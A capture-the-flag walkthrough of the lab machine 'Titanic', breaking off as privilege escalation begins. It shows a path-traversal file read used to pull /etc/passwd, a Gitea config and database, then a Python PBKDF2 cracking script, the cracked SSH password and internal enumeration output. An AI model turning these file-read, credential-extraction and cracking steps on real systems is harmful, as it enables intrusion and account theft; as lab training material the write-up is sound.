RECON

Port Scan

$ rustscan -a $target_ip --ulimit 1000 -r 1-65535 -- -A -sC -Pn

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGZG4yHYcDPrtn7U0l+ertBhGBgjIeH9vWnZcmqH0cvmCNvdcDY/ItR3tdB4yMJp0ZTth5itUVtlJJGHRYAZ8Wg=

| 256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDT1btWpkcbHWpNEEqICTtbAcQQitzOiPOmc3ZE0A69Z

80/tcp open http syn-ack Apache httpd 2.4.52

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.52 (Ubuntu)

|_http-title: Did not follow redirect to http://titanic.htb/

Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

URL: http://titanic.htb/

titanic.htb

Looks like there should be a Rose user somewhere?

Buttons on the web app are dead—except for booking a trip:

Submitting a booking sends a POST request to /book:

POST /book HTTP/1.1

Host: titanic.htb

Content-Length: 77

Content-Type: application/x-www-form-urlencoded

[...]



name=axura&email=axura%40axura.com&phone=00000000&date=2025-02-13&cabin=Suite

After submitting, a JSON file gets downloaded:

$ cat cf363ae6-7aeb-4005-bbbf-97041a17d382.json

{"name": "axura", "email": "axura@axura.com", "phone": "00000000", "date": "2025-02-13", "cabin": "Suite"}

That means a GET request is being made to /download. Copy the URL from BurpSuite:

http://titanic.htb/download?ticket=cf363ae6-7aeb-4005-bbbf-97041a17d382.json

Subdomains



Fuzz subdomains:

ffuf -c -u "http://titanic.htb" -H "HOST: FUZZ.titanic.htb" -w ~/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 -fc 301

We found dev.titanic.htb:


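The ffuf run above boils down to sending the same request with a different Host header each time and discarding the 301 redirects that unknown names receive. A minimal sketch of that idea in Python, assuming only the standard library; the function names probe_vhost, candidates, and is_hit are made up for illustration and are not part of ffuf:

```python
import http.client


def probe_vhost(ip: str, vhost: str, port: int = 80, timeout: float = 5.0) -> int:
    """Send GET / to `ip` with a spoofed Host header and return the status code."""
    conn = http.client.HTTPConnection(ip, port, timeout=timeout)
    try:
        # Supplying our own Host header stops http.client from adding one.
        conn.request("GET", "/", headers={"Host": vhost})
        return conn.getresponse().status
    finally:
        conn.close()


def candidates(words, base="titanic.htb"):
    """Yield WORD.base for each non-empty word, like ffuf's FUZZ keyword."""
    for word in words:
        word = word.strip()
        if word:
            yield f"{word}.{base}"


def is_hit(status: int, filtered=(301,)) -> bool:
    """Mimic `-fc 301`: keep only responses whose status is not filtered."""
    return status not in filtered


# Example loop (needs network access to the target, so it is left commented):
# for vhost in candidates(open("subdomains.txt")):
#     if is_hit(probe_vhost(target_ip, vhost)):
#         print(vhost)
```

Here target_ip and subdomains.txt are placeholders. ffuf remains the better tool for a 110,000-word list, since this sketch is sequential.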

The response from http://dev.titanic.htb also references gitea.titanic.htb:

dev.titanic.htb



The subdomain dev.titanic.htb hosts a Gitea v1.22.1 instance:



After self-registering, we gain access to the repositories:

Two projects belong to developer—time to clone and analyze them:

git clone http://dev.titanic.htb/developer/docker-config.git

git clone http://dev.titanic.htb/developer/flask-app.git

USER

LFI

A Local File Inclusion (LFI) vulnerability is present in the /download endpoint. Path traversal works, though it is not strictly required, since absolute paths are accepted as well:

$ curl http://titanic.htb/download\?ticket\=

{"error":"Ticket parameter is required"}

$ curl http://titanic.htb/download\?ticket\=../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin

systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin

messagebus:x:103:104::/nonexistent:/usr/sbin/nologin

systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin

pollinate:x:105:1::/var/cache/pollinate:/bin/false

sshd:x:106:65534::/run/sshd:/usr/sbin/nologin

syslog:x:107:113::/home/syslog:/usr/sbin/nologin

uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin

tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin

tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false

landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin

fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin

usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin

developer:x:1000:1000:developer:/home/developer:/bin/bash

lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false

dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin

_laurel:x:998:998::/var/log/laurel:/bin/false

Only one standard user, developer, is found; there is no Rose or Jack aboard the Titanic. This suggests the app is likely running inside a container.

Still, it's worth checking if developer holds the user flag:

$ curl http://titanic.htb/download\?ticket\=/home/developer/user.txt

ebfae95101820085acb4e0676a1a5936

Game over.
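Why does an absolute path work without any ../ sequences? A plausible explanation, assuming the handler simply joins the ticket parameter onto a tickets directory (app.py is not reproduced in this writeup, so this is a guess at its shape), is that os.path.join discards the base when the second argument is absolute. The names TICKETS_DIR, naive_ticket_path, and safe_ticket_path below are hypothetical:

```python
import os

TICKETS_DIR = "tickets"  # hypothetical base directory, not taken from app.py


def naive_ticket_path(ticket: str) -> str:
    """Vulnerable pattern: an absolute `ticket` replaces the base entirely."""
    return os.path.join(TICKETS_DIR, ticket)


def safe_ticket_path(ticket: str) -> str:
    """Resolve the path and refuse anything outside the tickets directory."""
    base = os.path.realpath(TICKETS_DIR)
    candidate = os.path.realpath(os.path.join(base, ticket))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("ticket escapes the tickets directory")
    return candidate
```

With the naive version, /home/developer/user.txt passes straight through, which matches the behaviour seen above. The guarded version rejects both the absolute path and the ../ variant.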

ROOT

Code Review | Gitea

We couldn't access the /proc pseudo filesystem via LFI, so we pivot to enumerating the web applications—thanks to the source code we cloned from Gitea:

$ tree docker-config

docker-config
├── gitea
│   └── docker-compose.yml
├── mysql
│   └── docker-compose.yml
└── README.md

3 directories, 3 files

$ tree flask-app

flask-app
├── app.py
├── README.md
├── static
│   └── styles.css
├── templates
│   └── index.html
└── tickets
    ├── 2d46c7d1-66f4-43db-bfe4-ccbb1a5075f2.json
    └── e2a629cd-96fc-4b53-9009-4882f8f6c71b.json

4 directories, 6 files

Inside flask-app/tickets/, we uncover two bookings:

{

"name": "Rose DeWitt Bukater",

"email": "[email protected]",

"phone": "643-999-021",

"date": "2024-08-22",

"cabin": "Suite"

}

{

"name": "Jack Dawson",

"email": "[email protected]",

"phone": "555-123-4567",

"date": "2024-08-23",

"cabin": "Standard"

}

Finally, Rose and Jack exist in the system, but only as booking records.

Inside docker-config/gitea/docker-compose.yml, we find how the Gitea instance is set up:

version: '3'
services:
  gitea:
    image: gitea/gitea
    container_name: gitea
    ports:
      - "127.0.0.1:3000:3000"
      - "127.0.0.1:2222:22" # Optional for SSH access
    volumes:
      - /home/developer/gitea/data:/data # Replace with your path
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always

The volumes section in the docker-compose.yml file specifies how data is stored persistently on the host machine:

volumes:
  - /home/developer/gitea/data:/data

This means:

- The host path /home/developer/gitea/data is mapped to the container path /data.

- Any file written to /data inside the Gitea container will be stored on the host at /home/developer/gitea/data.
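The mapping is a plain prefix swap, which can be sketched as a small helper. This is only an illustration of the bind mount described above; the function name container_to_host is made up, and /data/gitea/gitea.db is just an example path:

```python
import posixpath

HOST_DIR = "/home/developer/gitea/data"  # left side of the volume entry
CONTAINER_DIR = "/data"                  # right side of the volume entry


def container_to_host(path: str) -> str:
    """Translate a path inside the container to its location on the host."""
    path = posixpath.normpath(path)
    if path != CONTAINER_DIR and not path.startswith(CONTAINER_DIR + "/"):
        raise ValueError(f"{path} is not under {CONTAINER_DIR}")
    relative = posixpath.relpath(path, CONTAINER_DIR)
    return posixpath.normpath(posixpath.join(HOST_DIR, relative))


print(container_to_host("/data/gitea/gitea.db"))
```

Any path that Gitea's own configuration reports under /data can be translated this way before requesting it through the file-read primitive.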

Besides, docker-config/mysql/docker-compose.yml reveals credentials for the MySQL database:

version: '3.8'
services:
  mysql:
    image: mysql:8.0
    container_name: mysql
    ports:
      - "127.0.0.1:3306:3306"
    environment:
      MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!'
      MYSQL_DATABASE: tickets
      MYSQL_USER: sql_svc
      MYSQL_PASSWORD: sql_password
    restart: always

The MySQL server is only accessible from localhost (host-only binding). No volumes are explicitly defined, so MySQL stores its data in the default container path.
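The "host-only binding" reading comes from the first field of each ports entry. A minimal sketch of how the short IP:HOST_PORT:CONTAINER_PORT syntax can be interpreted; the helper names are hypothetical, and the two-field case assumes Docker's usual default of publishing on all interfaces:

```python
import ipaddress


def parse_port_mapping(mapping: str) -> tuple[str, int, int]:
    """Split a compose short-syntax port entry into (host_ip, host_port, container_port)."""
    parts = mapping.split(":")
    if len(parts) == 3:
        host_ip, host_port, container_port = parts
    elif len(parts) == 2:
        host_ip = "0.0.0.0"  # assumed default: all interfaces
        host_port, container_port = parts
    else:
        raise ValueError(f"unsupported mapping: {mapping}")
    return host_ip, int(host_port), int(container_port)


def is_loopback_only(mapping: str) -> bool:
    """True when the published port is reachable from the host itself only."""
    host_ip, _, _ = parse_port_mapping(mapping)
    return ipaddress.ip_address(host_ip).is_loopback


for entry in ("127.0.0.1:3000:3000", "127.0.0.1:2222:22", "127.0.0.1:3306:3306"):
    print(entry, "->", "loopback only" if is_loopback_only(entry) else "exposed")
```

All three entries from the two compose files bind to 127.0.0.1, so none of these services is reachable directly from outside the host.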

Gitea Enumeration

Comparing Titanic's compose file against the official Gitea documentation on installing with Docker reveals a discrepancy.

The one from Titanic:

volumes:

- /home/developer/gitea/data:/data

While the official example uses:

volumes:

- ./gitea:/data

- /etc/timezone:/etc/timezone:ro

- /etc/localtime:/etc/localtime:ro

The volume configuration here is non-standard. Following the official layout, the developer of Titanic would have mapped the host volume as /home/developer/gitea/:/data. Instead, the root of Gitea's data on the host is /home/developer/gitea/data/ rather than /home/developer/gitea/. Any file that Gitea writes to /data/ inside the container will appear in /home/developer/gitea/data/ on the host.

According to the official Gitea documentation, the container stores its important configuration and data in the following structure:

/data/

├── gitea/ # Main Gitea directory

│ ├── repositories/ # Where repositories are stored

│ ├── indexers/ # Search index data

│ ├── sessions/ # Session data

│ ├── log/ # Logs for Gitea

│ ├── conf/ # Configuration files

│ └── queue/ # Background processing

├── ...

In Titanic's setup, /data/ inside the container is mapped to /home/developer/gitea/data/ on the host. Since Gitea always creates /data/gitea/ inside the container, this means:

/home/developer/gitea/data/
└── gitea/ # This is created by container
    ├── conf/
    ├── repositories/
    ├── log/
    ├── queue/
    ├── indexers/
    └── sessions/

Therefore, the actual configuration file (app.ini) will be found at:

/home/developer/gitea/data/gitea/conf/app.ini

We can leak the configuration file app.ini via the LFI primitive:

curl 'http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/conf/app.ini'

It contains all configuration details for the Gitea instance:

APP_NAME = Gitea: Git with a cup of tea

RUN_MODE = prod

RUN_USER = git

WORK_PATH = /data/gitea

[repository]

ROOT = /data/git/repositories

[repository.local]

LOCAL_COPY_PATH = /data/gitea/tmp/local-repo

[repository.upload]

TEMP_PATH = /data/gitea/uploads

[server]

APP_DATA_PATH = /data/gitea

DOMAIN = gitea.titanic.htb

SSH_DOMAIN = gitea.titanic.htb

HTTP_PORT = 3000

ROOT_URL = http://gitea.titanic.htb/

DISABLE_SSH = false

SSH_PORT = 22

SSH_LISTEN_PORT = 22

LFS_START_SERVER = true

LFS_JWT_SECRET = OqnUg-uJVK-l7rMN1oaR6oTF348gyr0QtkJt-JpjSO4

OFFLINE_MODE = true

[database]

PATH = /data/gitea/gitea.db

DB_TYPE = sqlite3

HOST = localhost:3306

NAME = gitea

USER = root

PASSWD =

LOG_SQL = false

SCHEMA =

SSL_MODE = disable

[indexer]

ISSUE_INDEXER_PATH = /data/gitea/indexers/issues.bleve

[session]

PROVIDER_CONFIG = /data/gitea/sessions

PROVIDER = file

[picture]

AVATAR_UPLOAD_PATH = /data/gitea/avatars

REPOSITORY_AVATAR_UPLOAD_PATH = /data/gitea/repo-avatars

[attachment]

PATH = /data/gitea/attachments

[log]

MODE = console

LEVEL = info

ROOT_PATH = /data/gitea/log

[security]

INSTALL_LOCK = true

SECRET_KEY =

REVERSE_PROXY_LIMIT = 1

REVERSE_PROXY_TRUSTED_PROXIES = *

INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MjI1OTUzMzR9.X4rYDGhkWTZKFfnjgES5r2rFRpu_GXTdQ65456XC0X8

PASSWORD_HASH_ALGO = pbkdf2

[service]

DISABLE_REGISTRATION = false

REQUIRE_SIGNIN_VIEW = false

REGISTER_EMAIL_CONFIRM = false

ENABLE_NOTIFY_MAIL = false

ALLOW_ONLY_EXTERNAL_REGISTRATION = false

ENABLE_CAPTCHA = false

DEFAULT_KEEP_EMAIL_PRIVATE = false

DEFAULT_ALLOW_CREATE_ORGANIZATION = true

DEFAULT_ENABLE_TIMETRACKING = true

NO_REPLY_ADDRESS = noreply.localhost

[lfs]

PATH = /data/git/lfs

[mailer]

ENABLED = false

[openid]

ENABLE_OPENID_SIGNIN = true

ENABLE_OPENID_SIGNUP = true

[cron.update_checker]

ENABLED = false

[repository.pull-request]

DEFAULT_MERGE_STYLE = merge

[repository.signing]

DEFAULT_TRUST_MODEL = committer

[oauth2]

JWT_SECRET = FIAOKLQX4SBzvZ9eZnHYLTCiVGoBtkE4y5B7vMjzz3g

The system is configured for SQLite3 (gitea.db), which is the default for a container setup according to the official docs. The default path of the database file is:

# inside the container

/data/gitea/gitea.db

# on the host

/home/developer/gitea/data/gitea/gitea.db

Try extracting it via LFI:

curl -o gitea.db 'http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db'

Then we can access the database file locally:

$ sqlite3 gitea.db

SQLite version 3.47.2 2024-12-07 20:39:59

Enter ".help" for usage hints.

sqlite> .tables

access oauth2_grant

access_token org_user

action package

action_artifact package_blob

action_run package_blob_upload

action_run_index package_cleanup_rule

action_run_job package_file

action_runner package_property

action_runner_token package_version

action_schedule project

action_schedule_spec project_board

action_task project_issue

action_task_output protected_branch

action_task_step protected_tag

action_tasks_version public_key

action_variable pull_auto_merge

app_state pull_request

attachment push_mirror

auth_token reaction

badge release

branch renamed_branch

collaboration repo_archiver

comment repo_indexer_status

commit_status repo_redirect

commit_status_index repo_topic

commit_status_summary repo_transfer

dbfs_data repo_unit

dbfs_meta repository

deploy_key review

email_address review_state

email_hash secret

external_login_user session

follow star

gpg_key stopwatch

gpg_key_import system_setting

hook_task task

issue team

issue_assignees team_invite

issue_content_history team_repo

issue_dependency team_unit

issue_index team_user

issue_label topic

issue_user tracked_time

issue_watch two_factor

label upload

language_stat user

lfs_lock user_badge

lfs_meta_object user_blocking

login_source user_open_id

milestone user_redirect

mirror user_setting

notice version

notification watch

oauth2_application webauthn_credential

oauth2_authorization_code webhook

We see a user table containing all user credentials:

sqlite> SELECT * FROM user;

1|administrator|administrator||[email protected]|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c1a5d23caa49030172cdcabdc|2d149e5fbd1b20cf31db3e3c6a28fc9b|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e70639ac6b0eecbdab4a3d19e0f44|[email protected]|0|0|0|0|0|0|0|0|0||gitea-auto|0

2|developer|developer||[email protected]|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07fc9b557bc070fa7bef76a0d15|8bf3e3452b78544f8bee9400d6936d34|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e207e432f62f3508be406c11b|[email protected]|0|0|0|0|2|0|0|0|0||gitea-auto|0

PBKDF2

The password hashes extracted from the Gitea SQLite database are stored using PBKDF2. We explained how to crack hashes from gitea.db in the Compile writeup.
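Rather than picking fields out of the pipe-separated dump by eye, the values needed for cracking can be selected by name. A minimal sketch using Python's sqlite3 module; the column names name, passwd_hash_algo, salt, and passwd are an assumption based on Gitea's user table and should be confirmed with .schema user before relying on them:

```python
import sqlite3

# Column names are assumed from Gitea's schema; verify with `.schema user`.
QUERY = 'SELECT name, passwd_hash_algo, salt, passwd FROM "user"'


def dump_credentials(conn: sqlite3.Connection) -> list[dict]:
    """Return one dict per account with the fields needed for cracking."""
    rows = conn.execute(QUERY).fetchall()
    return [
        {"username": name, "algo": algo, "salt": salt, "key": key}
        for name, algo, salt, key in rows
    ]


# Usage against the downloaded file:
#   conn = sqlite3.connect("gitea.db")
#   for cred in dump_credentials(conn):
#       print(cred)
```

The salt and key come back as hex strings, matching the values visible in the raw dump.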

The hash_algo column specifies:

pbkdf2$50000$50

- PBKDF2 → A key derivation function (harder to crack than simple hashes like SHA1/MD5).

- 50000 iterations → Number of rounds (higher means more computationally expensive).

- 50 bytes → The hash output length.
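These three fields can be parsed mechanically, and the same data can be reshaped for a GPU cracker. The sketch below assumes hashcat's PBKDF2-HMAC-SHA256 format (mode 10900, as far as we know) of sha256:iterations:base64(salt):base64(hash); check the hashcat example hashes before use. The function names are made up for illustration:

```python
import base64
import binascii

# Values for the developer account, copied from the user table dump.
DEVELOPER_SALT = "8bf3e3452b78544f8bee9400d6936d34"
DEVELOPER_KEY = (
    "e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc"
    "8efc5dbef30bf1682619263444ea594cfb56"
)


def parse_hash_algo(spec: str) -> tuple[str, int, int]:
    """Split 'pbkdf2$50000$50' into (name, iterations, derived key length)."""
    name, iterations, dklen = spec.split("$")
    return name, int(iterations), int(dklen)


def to_hashcat_line(salt_hex: str, key_hex: str, iterations: int) -> str:
    """Re-encode hex salt and hash as base64 in the assumed hashcat layout."""
    salt = base64.b64encode(binascii.unhexlify(salt_hex)).decode()
    key = base64.b64encode(binascii.unhexlify(key_hex)).decode()
    return f"sha256:{iterations}:{salt}:{key}"


name, iterations, dklen = parse_hash_algo("pbkdf2$50000$50")
print(to_hashcat_line(DEVELOPER_SALT, DEVELOPER_KEY, iterations))
```

The key column holds 100 hex characters, which decodes to the 50 bytes named in the algorithm string.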

With all details known, we can reuse our script with a little modification to crack the hashes fast:

import hashlib

import binascii

from pwn import log

# Extracted hashes

hashes = [

"""Hash for administrator/root is verified to be uncrackable with rockyou.txt."""

# {

# "username": "root",

# "salt": binascii.unhexlify('2d149e5fbd1b20cf31db3e3c6a28fc9b'), # 16 bytes salt

# "key": 'cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136', # 50-byte hash

# },

{

"username": "developer",

"salt": binascii.unhexlify('8bf3e3452b78544f8bee9400d6936d34'), # 16 bytes salt

"key": 'e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56', # 50-byte hash

}

]

dklen = 50

iterations = 50000

wordlist = '/home/Axura/wordlists/rockyou.txt' # change path

def hash_password(password, salt, iterations, dklen):

"""Generate PBKDF2-HMAC-SHA256 hash."""

return hashlib.pbkdf2_hmac(

hash_name='sha256',

password=password.encode('utf-8'),

salt=salt,

iterations=iterations,

dklen=dklen,

)

# Start cracking process

for user in hashes:

bar = log.progress(f"Cracking PBKDF2 Hash for {user['username']}")

target_hash = binascii.unhexlify(user['key'])

salt = user['salt']

with open(wordlist, 'r', encoding='utf-8', errors='ignore') as f:

for line in f:

password = line.strip()

computed_hash = hash_password(password, salt, iterations, dklen)

bar.status(f'Trying: {password}')

if computed_hash == target_hash:

bar.success(f"Cracked {user['username']}: {password}")

break

else:



bar.failure(f"Failed to crack {user['username']}'s password.")The one from developer is proof to be crackable via rockyou.txt:

Now we can create an SSH connection to the remote machine with credentials developer / 25282528:

$ ssh [email protected]

developer@titanic:~$ id

uid=1000(developer) gid=1000(developer) groups=1000(developer)

developer@titanic:~$ sudo -l

[sudo] password for developer:

Sorry, user developer may not run sudo on titanic.

The developer user has no sudo privileges.

Internal Enumeration

We can run LinPEAS for quick enumeration. The bridge interfaces confirm that Docker is running:

╔══════════╣ Interfaces

# symbolic names for networks, see networks(5) for more information

link-local 169.254.0.0

br-892511bece4a: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255

inet6 fe80::42:fff:fea9:f7bd prefixlen 64 scopeid 0x20<link>

ether 02:42:0f:a9:f7:bd txqueuelen 0 (Ethernet)

RX packets 0 bytes 0 (0.0 B)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 5 bytes 526 (526.0 B)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500

inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255

ether 02:42:a5:c4:0d:db txqueuelen 0 (Ethernet)

RX packets 0 bytes 0 (0.0 B)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 0 bytes 0 (0.0 B)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 10.129.210.84 netmask 255.255.0.0 broadcast 10.129.255.255

inet6 fe80::250:56ff:feb0:46e0 prefixlen 64 scopeid 0x20<link>

inet6 dead:beef::250:56ff:feb0:46e0 prefixlen 64 scopeid 0x0<global>

ether 00:50:56:b0:46:e0 txqueuelen 1000 (Ethernet)

RX packets 51632 bytes 4378642 (4.3 MB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 20295 bytes 4010440 (4.0 MB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0

inet6 ::1 prefixlen 128 scopeid 0x10<host>

loop txqueuelen 1000 (Local Loopback)

RX packets 17154 bytes 3343601 (3.3 MB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 17154 bytes 3343601 (3.3 MB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

vethbb48ef8: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet6 fe80::d862:6bff:feab:99dd prefixlen 64 scopeid 0x20<link>

ether da:62:6b:ab:99:dd txqueuelen 0 (Ethernet)

RX packets 0 bytes 0 (0.0 B)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 31 bytes 2442 (2.4 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Internal open ports:

╔══════════╣ Active Ports

tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN 1140/python3

tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:2222 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:42925 0.0.0.0:* LISTEN -

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -

tcp6 0 0 :::22 :::* LISTEN -

tcp6 0 0 :::80 :::* LISTEN -

Additionally, some root-owned files that are readable through the developer group deserve attention:

╔══════════╣ Readable files belonging to root and readable by me but not world readable

-rw-r----- 1 root developer 7568 Aug 1 2024 /opt/app/templates/index.html

-rw-r----- 1 root developer 209762 Feb 3 17:13 /opt/app/static/assets/images/favicon.ico

-rw-r----- 1 root developer 280817 Feb 3 17:13 /opt/app/static/assets/images/luxury-cabins.jpg

-rw-r----- 1 root developer 291864 Feb 3 17:13 /opt/app/static/assets/images/entertainment.jpg

-rw-r----- 1 root developer 232842 Feb 3 17:13 /opt/app/static/assets/images/home.jpg

-rw-r----- 1 root developer 280854 Feb 3 17:13 /opt/app/static/assets/images/exquisite-dining.jpg

-rw-r----- 1 root developer 442 Feb 16 09:37 /opt/app/static/assets/images/metadata.log

-rw-r----- 1 root developer 567 Aug 1 2024 /opt/app/static/styles.css

-rwxr-x--- 1 root developer 1598 Aug 2 2024 /opt/app/app.py

-rw-r----- 1 root developer 33 Feb 15 22:15 /home/developer/user.txt

OpenSSH 9.7 (Rabbit Hole)

Besides port 3000 for Gitea and port 5000 for the Flask app, port 2222 is also open:

developer@titanic:~$ telnet 127.0.0.1 2222

Trying 127.0.0.1...

Connected to 127.0.0.1.

Escape character is '^]'.

SSH-2.0-OpenSSH_9.7

Invalid SSH identification string.

Connection closed by foreign host.

This indicates that port 2222 is running an SSH service, specifically OpenSSH version 9.7. That matches the 127.0.0.1:2222:22 mapping in the Gitea docker-compose.yml.
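The telnet check only relies on the identification line that an SSH server sends first. A small sketch that reads and parses that line with Python's socket module; grab_banner and parse_ssh_banner are hypothetical helper names, and the parsing follows the SSH-protoversion-softwareversion layout:

```python
import socket


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """Connect and return the first chunk the server sends, stripped."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.recv(256).decode("ascii", errors="replace").strip()


def parse_ssh_banner(banner: str) -> tuple[str, str]:
    """Split 'SSH-2.0-OpenSSH_9.7' into (protocol version, software version)."""
    if not banner.startswith("SSH-"):
        raise ValueError("not an SSH identification string")
    ident = banner.split(" ", 1)[0]  # drop optional trailing comments
    _, proto, software = ident.split("-", 2)
    return proto, software


# On the target this would be: parse_ssh_banner(grab_banner("127.0.0.1", 2222))
print(parse_ssh_banner("SSH-2.0-OpenSSH_9.7"))
```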

But we cannot authenticate using password:

developer@titanic:~$ ssh [email protected] -p 2222

The authenticity of host '[127.0.0.1]:2222 ([127.0.0.1]:2222)' can't be established.

ED25519 key fingerprint is SHA256:643vNoCUohMILJ0HdKhb9BlDGU/HggHjWLaJuquRGt4.

This key is not known by any other names

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '[127.0.0.1]:2222' (ED25519) to the list of known hosts.

[email protected]: Permission denied (publickey).

No private SSH key (id_rsa) exists in ~/.ssh/:

developer@titanic:~$ ls ~/.ssh -l

total 4

-rw------- 1 developer developer 0 Aug 1 2024 authorized_keys

-rw-r--r-- 1 developer developer 142 Feb 16 12:37 known_hosts

developer@titanic:~$ cat ~/.ssh/authorized_keys

The file is empty, so we can add our own key as a test. Generate a new SSH key:

ssh-keygen -t ed25519 -f axuraKey -N ""

Generated ED25519 key pair:

developer@titanic:~$ ls -l axura*

total 20

-rw------- 1 developer developer 411 Feb 16 12:47 axuraKey

-rw-r--r-- 1 developer developer 99 Feb 16 12:47 axuraKey.pub

Add the public key to authorized_keys:

developer@titanic:~$ cat axuraKey.pub >> ~/.ssh/authorized_keys

developer@titanic:~$ cat ~/.ssh/authorized_keys

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGNKSGYiihF4d9aTYjdYaNseE4fPHm4qrDaZtMDU84Uk developer@titanic

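developer@titanic:~$ chmod 600 ~/.ssh/authorized_keys

But the login still fails. This is expected if port 2222 belongs to the SSH daemon inside the Gitea container, which would not consult the host's ~/.ssh/authorized_keys: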

developer@titanic:~$ ssh -i axuraKey [email protected] -p 2222

[email protected]: Permission denied (publickey).

Anyway, it's not vulnerable to CVE-2024-6387:

$ python 'CVE-2024-6387 check.py' 127.0.0.1 --ports 2222

Results Summary:

Total targets scanned: 1

Ports closed: 0

Non-vulnerable servers: 1

- 127.0.0.1:2222 : Server running non-vulnerable version: SSH-2.0-OpenSSH_9.7

Vulnerable servers: 0

Privesc

During internal enumeration, we spotted something interesting under /opt. Inside /opt/scripts/, a Bash script owned by root is readable and executable by all users:

developer@titanic:~$ ls /opt -l

total 12

drwxr-xr-x 5 root developer 4096 Feb 7 10:37 app

drwx--x--x 4 root root 4096 Feb 7 10:37 containerd

drwxr-xr-x 2 root root 4096 Feb 7 10:37 scripts

